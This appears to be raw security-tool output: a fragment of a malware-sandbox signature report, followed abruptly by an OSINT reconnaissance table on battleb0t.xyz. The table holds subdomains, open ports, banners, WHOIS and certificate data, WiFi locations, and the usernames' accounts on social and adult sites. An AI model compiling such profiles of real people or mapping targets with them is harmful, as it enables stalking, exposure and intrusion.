u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"OpenThread" [Source: 00000000-00004708.00000000.77705.CAEDF000.00000002.mdmp]'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00004708"\n YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Extension State\\000003.log]- [targetUID: 00000000-00007376]\n "04a02e02-c03b-426d-8be8-484f86bfe2ba.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\04a02e02-c03b-426d-8be8-484f86bfe2ba.tmp]- [targetUID: 00000000-00001136]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007376]\n "typosquatting_list.pb" has type "data"- Location: [%TEMP%\\7376_302125849\\typosquatting_list.pb]- [targetUID: 00000000-00007376]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\7376_1093145157\\Filtering Rules]- [targetUID: 00000000-00007376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007376]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 413534"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00001136]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\7376_302125849\\_metadata\\verified_contents.json]- [targetUID: 00000000-00007376]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Kids Mode\\0.0.0.10\\manifest.fingerprint]- [targetUID: 00000000-00007376]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007376]\n "ee112835-328c-4e32-a5d4-fb2715bea0bc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ee112835-328c-4e32-a5d4-fb2715bea0bc.tmp]- [targetUID: 00000000-00007376]\n "Session_13322616210952279" has type "data"- [targetUID: N/A]\n "61b14bdf-c2ee-416d-b78e-d3d4b4a06383.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\61b14bdf-c2ee-416d-b78e-d3d4b4a06383.tmp]- [targetUID: 00000000-00007376]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007376]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007376]\n "f34135bd94e6cca1_0" has type "data"- [targetUID: N/A]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\shopping_fre.html]- [targetUID: 00000000-00007376]\n "9be37f3e-709d-4866-b8f9-622ffd41feca.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\9be37f3e-709d-4866-b8f9-622ffd41feca.tmp]- [targetUID: 00000000-00007376]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\edge_driver.js]- [targetUID: 00000000-00007376]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007376]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-4', u'name': u'Found a string that may be used as part of an injection method', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1055/011', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1055.011', u'relevance': 4, u'threat_level': 0, u'type': 2, u'description': u'"Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-184', u'name': u'Found registry location strings which can modifies auto-execute functionality', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1547/001', u'threat_level_human': u'informative', u' | 185.199.111.153 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.41): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | fanpop (Category: social)
https://www.fanpop.com/fans/ayhu | ayhu |
| 2023-05-12 02:45:41 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | San Francisco (South Beach), California, 94107, United States, North America | 185.199.110.153 |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | registrar-abuse@google.com | Domain Name: AHU.XYZ
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40.0Z
Creation Date: 2020-08-10T01:10:12.0Z
Registry Expiry Date: 2026-08-10T23:59:59.0Z
Registrar: Google Inc
Registrar IANA ID: 895
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.2065311374
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ahu.xyz
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40Z
Creation Date: 2020-08-10T01:10:12Z
Registrar Registration Expiration Date: 2026-08-10T23:59:59Z
Registrar: Google LLC
Registrar IANA ID: 895
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.8772376466
Domain Status: serverTransferProhibited https://www.icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: go663216313251
Registrant Name: Contact Privacy Inc. Customer 7151571251
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant Street: 96 Mowat Ave
Registrant City: Toronto
Registrant State/Province: ON
Registrant Postal Code: M4K 3K1
Registrant Country: CA
Registrant Phone: +1.4165385487
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Admin ID: go663216313251
Admin Name: Contact Privacy Inc. Customer 7151571251
Admin Organization: Contact Privacy Inc. Customer 7151571251
Admin Street: 96 Mowat Ave
Admin City: Toronto
Admin State/Province: ON
Admin Postal Code: M4K 3K1
Admin Country: CA
Admin Phone: +1.4165385487
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Tech ID: go663216313251
Tech Name: Contact Privacy Inc. Customer 7151571251
Tech Organization: Contact Privacy Inc. Customer 7151571251
Tech Street: 96 Mowat Ave
Tech City: Toronto
Tech State/Province: ON
Tech Postal Code: M4K 3K1
Tech Country: CA
Tech Phone: +1.4165385487
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:16:36.418919Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
Please register your domains at: https://domains.google.com/
This data is provided by Google for information purposes, and to assist
persons obtaining information about or related to domain name registration
records. Google does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data only for
lawful purposes and that, under no circumstances, will you use this data to:
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail (spam); or
2) enable high volume, automated, electronic processes that apply to this
WHOIS server.
These terms may be changed without prior notice.
By submitting this query, you agree to abide by this policy.
|
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.14): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.34): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:26 | Username | No | Social Network Identifier | 172 | 0 | 5 | 0 | None | login | https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.JTdCJTIyaWF0JTIyJTNBMTY4Mzg2MDA2MiUyQyUyMmF1dGhEb21haW4lMjIlM0ElMjJxb2xodWIuY2xvdWRmbGFyZWFjY2Vzcy5jb20lMjIlMkMlMjJob3N0bmFtZSUyMiUzQSUyMnBhbmVsLmJhdHRsZWIwdC54eXolMjIlMkMlMjJyZWRpcmVjdFVSTCUyMiUzQSUyMiUyRiUyMiUyQyUyMmF1ZCUyMiUzQSUyMjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMlMjIlMkMlMjJpc1NhbWVTaXRlTm9uZUNvbXBhdGlibGUlMjIlM0F0cnVlJTJDJTIyaXNJRFBUZXN0JTIyJTNBZmFsc2UlMkMlMjJpc1JlZnJlc2glMjIlM0FmYWxzZSUyQyUyMm5vbmNlJTIyJTNBJTIybnJqNDNmeHBOVUJsSTJVdGQlMjIlMkMlMjJpZHBJZCUyMiUzQSUyMjc2MDcwNmM0LTZhMGItNDFlZC05ZjJhLTI5NGFkZjQ1NjBkYSUyMiUyQyUyMnNlcnZpY2VfdG9rZW5faWQlMjIlM0ElMjIlMjIlMkMlMjJzZXJ2aWNlX3Rva2VuX3N0YXR1cyUyMiUzQWZhbHNlJTJDJTIyYXV0aF9zdGF0dXMlMjIlM0ElMjJOT05FJTIyJTJDJTIyaXNfd2FycCUyMiUzQWZhbHNlJTJDJTIyaXNfZ2F0ZXdheSUyMiUzQWZhbHNlJTJDJTIybXRsc19hdXRoJTIyJTNBJTdCJTIyY2VydF9pc3N1ZXJfc2tpJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9wcmVzZW50ZWQlMjIlM0FmYWxzZSUyQyUyMmNlcnRfc2VyaWFsJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9pc3N1ZXJfZG4lMjIlM0ElMjIlMjIlMkMlMjJhdXRoX3N0YXR1cyUyMiUzQSUyMk5PTkUlMjIlN0QlMkMlMjJhcHBTZXNzaW9uSGFzaCUyMiUzQSUyMjRmN2M5OTlmNGM0OTk1OTE5NTUyZGRkYWUzMWYwMzEwZjI2OTc4ZWZlZGE1M2FmMmQ4MThmNWVlZTRlY2EyOTMlMjIlN0Q%3D |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WIN-MAKCI77HADK 1028 (Net ID: 38:1D:D9:1B:3E:B3) | 37.751, -97.822 |
| 2023-05-12 02:47:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 104.196.30.220:80 | 104.196.30.220 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551551399 (Net ID: 00:01:E3:55:13:99) | 52.3759, 4.8975 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.110.153 |
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 3 | 0 | 3 | 0 | None | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.eyJzZXJ2aWNlX3Rva2VuX3N0YXR1cyI6ZmFsc2UsImlhdCI6MTY4Mzg2MDA2Miwic2VydmljZV90b2tlbl9pZCI6IiIsImF1ZCI6IjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMiLCJob3N0bmFtZSI6InBhbmVsLmJhdHRsZWIwdC54eXoiLCJhcHBfc2Vzc2lvbl9oYXNoIjoiNGY3Yzk5OWY0YzQ5OTU5MTk1NTJkZGRhZTMxZjAzMTBmMjY5NzhlZmVkYTUzYWYyZDgxOGY1ZWVlNGVjYTI5MyIsIm5iZiI6MTY4Mzg2MDA2MiwiaXNfd2FycCI6ZmFsc2UsImlzX2dhdGV3YXkiOmZhbHNlLCJ0eXBlIjoibWV0YSIsInJlZGlyZWN0X3VybCI6IlwvIiwibXRsc19hdXRoIjp7ImNlcnRfaXNzdWVyX3NraSI6IiIsImNlcnRfcHJlc2VudGVkIjpmYWxzZSwiY2VydF9zZXJpYWwiOiIiLCJjZXJ0X2lzc3Vlcl9kbiI6IiIsImF1dGhfc3RhdHVzIjoiTk9ORSJ9LCJhdXRoX3N0YXR1cyI6Ik5PTkUifQ.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg | panel.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA (Net ID: 00:02:2D:27:BC:4F) | 50.1188, 8.6843 |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8e:ad:47:f4:d5:0c:35:7b:16:d0:9b:94:a8:b1:26:20:fb:
c5:de:a5:93:db:57:19:e0:12:90:43:82:bc:d6:2f:43:eb:2e:
4c:de:6a:4e:5a:f7:3a:69:b4:d3:79:d5:3c:fc:10:95:09:06:
01:1c:46:7d:6d:7c:be:7f:a8:01:e3:93:44:8e:bd:bd:0d:b0:
bd:c9:0f:53:30:c3:5b:43:1c:de:0d:db:29:b4:9c:76:9a:cb:
51:4b:06:1b:20:dd:ec:e9:a2:bf:56:76:bf:92:0c:eb:70:70:
9b:b4:4a:4f:2d:37:e0:34:a0:a3:ff:13:86:8a:79:7e:16:1e:
8e:c6:82:ca:0f:96:f3:8a:2f:c4:0b:aa:a8:ac:55:f4:88:40:
e0:16:cf:a7:dc:c0:30:00:8e:a5:37:c8:bd:86:e7:c9:7f:a2:
43:a8:8f:4d:72:0e:2a:78:36:4d:70:de:f4:63:fb:7a:69:dd:
eb:ae:02:25:ec:2e:30:97:68:f6:5a:d7:e8:b6:58:95:b6:c1:
cc:b3:c2:25:09:9a:c8:a4:d7:3d:29:63:7c:34:a0:fc:c2:d0:
5c:94:37:dd:b4:c4:b6:03:3f:3d:50:00:5d:5e:7b:c9:e9:6b:
3d:db:2e:3d:c8:b1:34:d0:37:5f:80:1d:38:7f:1c:95:f3:da:
c4:21:7d:17
|
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=ayhu | ayhu |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | PureFTPd Pure-FTPd | 87.248.157.102 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2096 | 104.21.71.14 |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:443 | 188.114.97.0/24 |
| 2023-05-12 02:44:09 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | *.github.io, github.io, *.github.com, github.com, www.github.com, *.githubusercontent.com, githubusercontent.com | battleb0t.xyz |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:8080 | 188.114.97.0/24 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | giters (Category: coding)
https://giters.com/battleb0t | battleb0t |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 7637 0253 (Net ID: 00:1C:FB:F9:EC:50) | 32.8608, -79.9746 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c546dd3883829f4-ORD"]} | 188.114.97.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GWF (Net ID: 00:06:25:06:28:35) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:49 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 35.229.48.116 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | xHamster (Category: XXXPORNXXX)
https://xhamster.com/users/ayhu | ayhu |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Airliners (Category: social)
https://www.airliners.net/user/login/profile | login |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.54): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:443 | 172.67.135.9 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/battleb0t | battleb0t |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WLAN (Net ID: 00:02:44:AF:55:CE) | 50.1188, 8.6843 |
| 2023-05-12 03:17:44 | Username | No | Account Finder | 58 | 0 | 1 | 0 | None | ayhu | ayhu.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LF-X1U.00014A10EF0C (Net ID: 00:01:4A:10:EF:0C) | 37.7813933,-122.3918002 |
| 2023-05-12 02:53:25 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3030::ac43:a8fc | www.battleb0t.xyz |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.146): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:56 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8d-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 8F4E:438C:28D6A76:39C4C57:645DA4A1
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100090-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683858593.452046,VS0,VE24
Vary: Accept-Encoding
X-Fastly-Request-ID: bf30db8298ebcbd37ba35a7187f0fd669e8117db
| 2606:50c0:8001::153 |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | pics.battleb0t.xyz | [{"url": "https://pics.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5221619826367a-FRA
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | dragontears (Net ID: 00:0C:F6:42:E6:42) | 50.8897, 6.0563 |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": 